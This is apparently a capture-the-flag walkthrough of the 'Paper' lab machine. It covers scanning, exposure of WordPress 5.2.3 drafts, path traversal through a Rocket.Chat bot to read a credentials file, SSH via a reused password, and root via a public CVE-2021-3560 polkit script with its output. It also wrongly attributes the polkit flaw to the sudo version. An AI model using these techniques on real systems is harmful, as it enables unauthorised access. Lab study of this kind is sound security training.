Enumeration

Let’s start off with an nmap scan as usual to get a listing of open ports and running services:

sudo nmap -sS -sV -sC -oN scan_full.log -p- -T5 -Pn -n -v $target

Which returns the results:

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-07-03T08:52:34
| Not valid after:  2022-07-08T10:32:34
| MD5:   579a:92bd:803c:ac47:d49c:5add:e44e:4f84
|_SHA-1: 61a2:301f:9e5c:2603:a643:00b5:e5da:5fd5:c175:f3a9
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9

It looks like a typical Linux web server set-up: port 22 for remote administration via SSH, and ports 80 and 443 for serving web applications. Going to port 80 reveals the default HTTP test page for CentOS, a Linux distribution commonly used on web servers. It can be considered equivalent to Red Hat Enterprise Linux without the enterprise support.

Going to port 443 reveals the same site. We need to start doing some directory busting to work out what’s running on the server:

feroxbuster -u http://$target/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

One important thing to notice while exploring the box is a custom response header being returned:

X-Backend-Server: office.paper

This is probably a subtle hint that a specific virtual host name is required in order to be routed to the correct web application. Let’s add it to our /etc/hosts file and then revisit the site.

Going to the site reveals a blog that is a satirical reference to the US version of the TV show The Office.

Something useful we find while browsing the site is a comment on a post saying:

Michael, you should remove the secret content from your drafts ASAP, as they are not that secure as you think!  
-Nick

prisonmike is likely the owner of the site, since he references having set it up, and he is evidently not very good at security because there is something secret sitting in his drafts.

Given that it is a WordPress site, we can run wpscan against it:

wpscan --url http://office.paper/

Running this returns some useful information, including the version of the WordPress instance, which is 5.2.3.

Exploiting WordPress 5.2.3

This version of WordPress has a well-known exploit that allows an attacker to read content they should not be able to, including the secret mentioned earlier. The exploit is documented here: https://www.exploit-db.com/exploits/47690

We can test this by going to http://office.paper/?static=1; in the list of returned posts is the one referred to in Michael’s drafts. The draft concerns a chat application and exposes both its subdomain and its registration URL.

Going to this subdomain reveals a Rocket.Chat instance with a self-registration portal. We can sign up our own user and see what is visible.

Exploiting recyclops

One of the things we can see is that the user dwight has set up a chat bot of some kind called recyclops. It can perform file-system tasks for the user, such as fetching and listing files. Start a direct conversation with the bot and ask it to list files, for example, and it will respond:

Fetching the directory listing of files

- ls: cannot access '/home/dwight/sales/files': No such file or directory

It looks like it uses ls under the hood when you ask it to list anything, so command injection might be possible. Sending just list on its own returns:

drwxr-xr-x 4 dwight dwight 32 Jul 3 2021 .  
drwx------ 11 dwight dwight 281 Feb 6 2022 ..  
drwxr-xr-x 2 dwight dwight 27 Sep 15 2021 sale  
drwxr-xr-x 2 dwight dwight 27 Jul 3 2021 sale_2

We can also send list .., which reveals the contents of dwight’s home directory! With this ability we can read anything dwight can, including a sensitive .env file in the /home/dwight/hubot directory that contains a password. dwight has reused this password, so it can be used to log in via SSH.

Privilege Escalation from dwight

One of the first things to do on a Linux box is to check the versions of running software, including default expected services such as sudo. The sudo version on this machine is 1.8.29, which has a known exploit called polkit. An example PoC for this can be found here: https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation/tree/main

The script is well documented, so usage is simple. We can transfer it to the target and run it like so:

./polkit.sh -u=pentester -p='Pentester123!'

I needed to run it several times before it worked because it abuses a race condition. A successful attack looks like:

[!] Username set as : pentester
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username pentester...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username pentester  with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - pentester
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!

We can then log in with su pentester, supply the password, run sudo bash, and we have a full root shell!